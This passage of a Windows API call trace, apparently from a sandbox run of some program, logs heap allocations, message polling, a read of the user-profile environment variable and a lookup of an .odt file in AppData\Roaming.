hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0122.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0122.868] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.868] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0122.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0122.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0122.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0122.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0122.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0122.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0122.870] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0122.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0122.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0122.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0122.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.872] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0122.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0122.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0122.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0122.875] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/lNMKqFE.odt", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a94210, ftCreationTime.dwHighDateTime=0x1d5d3d7, ftLastAccessTime.dwLowDateTime=0x21380940, ftLastAccessTime.dwHighDateTime=0x1d5cc78, ftLastWriteTime.dwLowDateTime=0x21380940, ftLastWriteTime.dwHighDateTime=0x1d5cc78, nFileSizeHigh=0x0, nFileSizeLow=0x5974, dwReserved0=0x0, dwReserved1=0x0, cFileName="lNMKqFE.odt", cAlternateFileName="")) returned 0x9a47c0 [0122.875] FindClose (in: hFindFile=0x9a47c0 | out: hFindFile=0x9a47c0) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0122.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0122.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 